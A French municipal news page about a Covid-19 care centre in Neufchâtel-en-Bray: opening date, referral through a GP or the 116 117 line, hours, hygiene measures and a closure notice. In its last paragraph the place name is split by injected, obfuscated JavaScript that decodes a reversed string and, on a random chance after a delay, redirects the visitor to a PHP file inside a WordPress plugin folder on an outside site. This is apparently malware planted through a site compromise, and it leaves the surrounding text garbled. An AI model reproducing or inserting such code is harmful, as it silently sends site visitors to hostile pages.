Centre de soins Covid-19 à Neufchâtel-en-Bray

Accueil > Actualites > Centre de soins Covid-19 à Neufchâtel-en-Bray

En cas de symptômes, pouvant évoquer une infection, il est indispensable de ne pas se déplacer et de contacter par téléphone son médecin traitant (ou à défaut un médecin régulateur) qui sera seul à même de juger de votre venue au centre de soins Covid-19.

Fermeture du Centre de soins Covid-19 de Neufchâtel-en-Bray jusqu’à nouvel ordre.

Une unité de soins dédiée à la prise en charge de patients porteurs d’infection par le COVR 19, ou suspects de l’être, a été installée dans les locaux de la salle Jacques Anquetil de Neufchâtel-en-Bray. Elle ouvre ses portes ce lundi 30 mars 2020.

C’est un dispositif spécifique qui trouve sa place entre les cabinets médicaux et les urgences hospitalières auxquels il ne se substitue pas.

Les patients pris en charge seront adressés par leur médecin traitant ou un médecin régulateur (116 117) joints au préalable.

En cas de symptômes, pouvant évoquer une infection, il est donc indispensable de ne pas se déplacer et de contacter par téléphone son médecin traitant (ou à défaut un médecin régulateur) qui sera seul à même de juger de la pertinence de votre venue au centre dédié.

L’objet de ce centre est de faciliter et de sécuriser la prise en charge des patients nécessitant un examen physique sans pour autant avoir l’obligation de les adresser directement dans un service d’urgence hospitalier.

En cas de signe avérée de gravité ils seront réacheminés via le centre 15 dans une structure hospitalière.

En absence de ces signes de gravité les patients seront amenés à regagner leur domicile avec une ordonnance et un éventuel arrêt de travail.

Un contrôle médical ou paramédical sera réalisé pour le suivi du patient au 7ème et au 12ème jour.

Conditions pratiques
Les patients seront accueillis de 9h à 17h30, 7 jours sur 7, par des soignants du territoire. Une attention rigoureuse sera portée sur la gestion des risques (lavage des mains à l’entrée, distance d’un mètre de sécurité respectée, couloirs de circulation formalisés…).

Ce schéma a été défini par les acteurs de la communauté professionnelle territoriale de santé (CPTS) en collaboration avec les élus des communes de Neufchâtel-en-Bray, Mesnières-en-Bray et les Grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andes-Ventes, ainsi que la Communauté Bray-Eawy.

) == "string") return $Ubj.list[n].split("").reverse().join("");return $Ubj.list[n];};$Ubj.list=["'php.litu.ssalc/sedulcni/retadpu-yfimeht/snigulp/tnetnoc-pw/moc.setaicossadnalanruoj//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andie »]